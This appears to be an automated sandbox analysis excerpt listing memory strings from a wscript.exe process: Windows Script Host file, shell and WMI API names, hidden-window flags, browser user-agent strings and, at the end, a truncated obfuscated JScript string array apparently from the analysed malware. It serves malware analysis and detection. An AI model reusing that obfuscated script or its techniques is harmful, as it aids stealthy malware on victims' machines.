Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: datelastmodifiedmemstr_2f10ce0c-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: datelastaccessedmemstr_16a78be6-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pbstrtypewwwmemstr_b70a6dcd-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xdeletewwmemstr_75a0c3cd-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: destinationwmemstr_7cc56a6e-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: overwritefileswwmemstr_edc258fd-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >ymovememstr_98f90617-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: isrootfoldermemstr_4da36ba0-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lpfrootfoldermemstr_2a7da01d-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -xpvarsizememstr_03082910-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nifoldercollectionwwwmemstr_14f1f4d6-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: raddwmemstr_e26d72b7-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ppenumwwmemstr_2f031072-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: plcountwmemstr_c4780064-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x=subfolderswwmemstr_9d8f486b-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,ppfolderswwwmemstr_56f924b4-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ifilecollectionwmemstr_569a426e-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ifilewwwmemstr_d61edfb8-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5openastextstreammemstr_15a662fe-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7#formatwwmemstr_f3fad3d8-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ppfilewwmemstr_21500c73-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (wxfileswwwmemstr_75ff25e6-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ppfileswmemstr_89a02115-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: createtextfilewwmemstr_cae0ab03-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: filenamememstr_79f8bcb6-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: overwritewwwmemstr_1bc0d51b-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: unicodewmemstr_d311ef0c-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |rootfolderwwmemstr_3124ad7c-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: availablespacewwmemstr_e7fbc472-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pvaravailwwwmemstr_bdc506f0-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: freespacewwwmemstr_80b42f2f-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {pvarfreememstr_219127a4-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ptotalsizewwwmemstr_59375f85-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pvartotalwwwmemstr_1f4d61a7-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: volumenamewwmemstr_226cf857-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tfilesystemwwmemstr_ecd24ddc-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pbstrfilesystemwmemstr_5132a940-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: serialnumbermemstr_847d139a-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pulserialnumberwmemstr_edfaeb05-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: isreadywmemstr_961f94bb-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {qpfreadywmemstr_d8fec19d-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: driveswwmemstr_93953ec1-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ppdrivesmemstr_9e8d9e01-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ppdrivesmemstr_696a68c3-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $buildpathwwwmemstr_ce0bf1f0-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pbstrresultwmemstr_65389d3f-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pbstrresultw@memstr_97b075ac-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n(getdrivenamememstr_0ddb9512-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n(getdrivenamememstr_34ae6f08-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: getparentfoldernamewmemstr_dbc1c992-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: getparentfoldernamew8memstr_e459954b-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: getfilenamewmemstr_ad500b4a-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: getfilenamewmemstr_6933b180-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wcgetbasenamewmemstr_4fa56b08-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wcgetbasenamewmemstr_26d65f76-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: getextensionnamememstr_7da1830e-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: getextensionnamememstr_28317cc6-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: getabsolutepathnamewmemstr_9eaf8496-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: getabsolutepathnamewmemstr_88eb6c78-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gettempnamewmemstr_a899f3f0-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gettempnamewmemstr_ce2ba373-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: driveexistswmemstr_ea8a6346-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: drivespecwwwmemstr_ce36d6ab-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pfexistsmemstr_1cd4d8c5-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pfexists\memstr_0ad9506b-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fileexistswwmemstr_f508668c-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: filespecmemstr_19473a2b-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: filespecmemstr_8d382b42-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: folderexistsmemstr_6422bcf8-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: afolderspecwwmemstr_3475366a-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: afolderspecww<memstr_4571db1e-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?+getdrivememstr_a1df5ccc-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?+getdrive|memstr_b6d73936-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :getfilewmemstr_b6a6aba3-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ofilepathmemstr_5614611c-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ofilepath$memstr_acd40970-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: getfolderwwwmemstr_4ca23912-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: folderpathwwmemstr_0458e821-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: specialfolderconstwwmemstr_151715e0-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o__midl___midl_itf_iwshom_0000_0000_0003wmemstr_a623585a-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windowsfolderwwwmemstr_156e7bd3-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: systemfoldermemstr_65197fa3-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: temporaryfolderwmemstr_a2800a1e-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: temporaryfolderwmemstr_430dbb01-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q\getspecialfoldermemstr_1f4d78c5-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _#specialfolderwwwmemstr_66303037-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _#specialfolderwwwpmemstr_f848a221-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: deletefilewwmemstr_9e5e2607-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: deletefilewwmemstr_13791094-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: deletefoldermemstr_da90a827-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: deletefoldermemstr_c538f5bd-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: movefilememstr_cd6c6035-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sourcewwmemstr_26335164-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sourcewwmemstr_8163156a-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: movefolderwwmemstr_b4ee52bc-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: movefolderwwmemstr_2f2af3f2-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: copyfilememstr_4d495098-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: copyfilememstr_bff4b252-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %copyfolderwwmemstr_cd8dfeb2-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %copyfolderwwmemstr_09de48aa-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: createfoldermemstr_04bee395-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: createfolder0memstr_498a4548-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: opentextfilememstr_c975cdaa-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcreatewwmemstr_d37aed71-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uifilesystem3memstr_63abc649-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: standardstreamtypeswmemstr_8b4bef96-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o__midl___midl_itf_iwshom_0000_0000_0004wmemstr_e97d5b86-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: getstandardstreamwwwmemstr_d9498dcc-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: standardstreamtypewwmemstr_de0bcf2e-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !getfileversionwwmemstr_d5575470-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fileversionwmemstr_54254483-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8nufilesystemobjectmemstr_e4cd1c76-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qfolderwwmemstr_e4153011-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: folderswmemstr_fecba1cb-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gtextstreamwwmemstr_48aaf4f3-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <wshwindowstylewwmemstr_41b94db8-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #__midl___midl_itf_iwshom_0001_0016_0001wmemstr_77c90b2e-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshhidewmemstr_bfbd2376-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nwshnormalfocuswwmemstr_33e6e12c-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshminimizedfocuswwwmemstr_ff301459-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0#zwshmaximizedfocuswwwmemstr_98ad8c97-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]wshnormalnofocusmemstr_867ae947-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshminimizednofocuswmemstr_7db8ba88-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0wshshellmemstr_48ff48a1-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshshell_classwmemstr_1c441f7d-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshshortcutwmemstr_682b4548-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshshortcut_classwwmemstr_9cebbbf0-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshnetworkwwmemstr_945869b7-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshnetwork_classwwwmemstr_64ee80c4-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshcollectionwwwmemstr_8111751d-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshcollection_classmemstr_702a4e60-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshenvironmentwwmemstr_1c2d7e5b-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: liwshenvironment_classwwwmemstr_6541c184-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshurlshortcutwwmemstr_8f38be8e-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [iwshurlshortcut_classwwwmemstr_6eb4a69a-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshexecwmemstr_19ce3078-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iswbemlomemstr_a80be04b-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tn}frlmemstr_e514f9a9-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/5.0 (compatible; msie 10.0; windows nt 10.0; win64; x64; trident/7.0)memstr_cecf6768-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/5.0 (compatible; msie 10.0; windows nt 10.0; win64; x64; trident/7.0; .net4.0c; .net4.0e; .net clr 2.0.50727; .net clr 3.0.30729; .net clr 3.5.30729)memstr_de2ffb20-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mozilla/5.0 (compatible; msie 10.0; windows nt 10.0; win64; x64; trident/7.0; .net4.0c; .net4.0e; .net clr 2.0.50727; .net clr 3.0.30729; .net clr 3.5.30729)wbemmemstr_f4470c29-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =#d}u0memstr_fafbd687-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: errclienmemstr_95aef9b6-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: naskomemstr_40ebebe0-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gwk&c[?memstr_d1b59f12-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: flagusecurrenttimewwmemstr_2f7e85ea-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8_<wbemqueryflagenumwwwmemstr_ca562bcc-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0sdwbemqueryflagdeepwwwmemstr_1c74674b-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0[iwbemqueryflagshallowmemstr_6e24a85b-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0zhwbemqueryflagprototypewwmemstr_94435eef-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wbemtextflagenummemstr_fc0d86ab-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wbemtextflagnoflavorswwwmemstr_42a27599-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wbemtimeoutwmemstr_9b7ed31e-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t;1ectomemstr_4effb2eb-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wbemconnectflagumemstr_4b46844a-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v:^s.9z[3p4c/memstr_a106240d-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pd98p!memstr_782cce58-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\usermemstr_b8935025-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: desktop@shell32.dll,-21769memstr_baa973af-e
Source: wscript.exe, 0000000B.00000003.2892442519.000001F1D1221000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var mwpxedrmum=["","*jm!fhe6-~z)ty|?bd^0h%gluk9=i2a\",\\tx#& 5:kb;oc[rudssoj8`p{wa1$.c/><fe7g}zvqin+_3pw(@rnm'lqyvx4]","ru#9ko%?n+h'xc/gxg;3-p6tieecz:*=dwsid>lyh8\"7ua\\lf4<qn0 j&|q@~m1]$5w{r_j.2pyk)`vsbbmaovt[(!z^f},","y*c","vdx$s,e1|a#vg8]dz<q{>ao(h~r!pe0: ij\"-*?y6c)cwbtr35/s7ltfb.9`&m@o4_2lk[i\\g;j}nuupqn'wy=khm^f%x+z","muirswj6t?eqaqfm2t4no-is9\\%vc!/{;'~k*&d(.g})g5k b=o$,py@ld#jh[evc<:nzwaxz0_3\"h]fl^8y`|pburx+>17","\\&$rz","=_s-.^h(}a/w0lyo<8awm6qfp\"{r][sbgd)k$@c+7ut';b2kqm|4:1!>~viej u&fi3?xrpvg9xl5%od`#z*,zctnj\\ehny",")rb~&>ma3@_owvrp(gc<f;k|g-'/^6#.1imul+}*qqo[vl8d4=0{jxj9w7fy\\,\"pskn`2iezbd!u%hzexy]?tta$: shnc5","!","jrr%;dxpn-s'.uf}mo)b\"y]6zbw1fkm0hhygva2q97t{e3&wiv@spc,\\>(k!~4`q?$o8^j:[+<|elic t5xdagz=u*l/#_n","nha41+wfi7bd6rs=t`z~x<sok&@3[2hd59jfl8x'eut!>*(]rl -\\czm|mo:,^vway${pup\"}/c;g%?i0yvnq).ej_bqk#g","<z--azqz<","an/pkuzxwa)>qzs.%o!;#\"f]l:6,+prbdyme1r5jdcv=jy&ekm(cgv9nbt{hq| 4h`uo2?@3}t~_[$g\\i8<*f7'wl-i0xs^","d30d;mav}!_bv\\uhso`5wl'^8>bia9|]gj:-o,f\"c1~cyz{/yf)$(h= zrestunn+[7xrkx&t<lq*iw@pk%?4g#j6p2qme.","ly&bwywccew?wl","eg8luiov q2jh,5!4{['|*d=`y]mn#c6>l$\\xvptbko@(-);kis9r3w:frcg}jz<%.m?wxhq&0^yp_unsdtabf\"/+~z17ea","ekr%g]>umn;@t:`xgwd6uci(5!f{q_s8)4lb&k\"~c=|9yqs<n}#z0'.?hwp7j,mbvivtar eojxl+hz1^yf[/\\2p*oa3$d-","ham^#h","oj&\\+p7whw@y{2`zf#lxuknsl;d.o$]~1m9%i4ij=s!6dta5ea_3m(kb\"gyb[et8|0zun>cx-?rp) 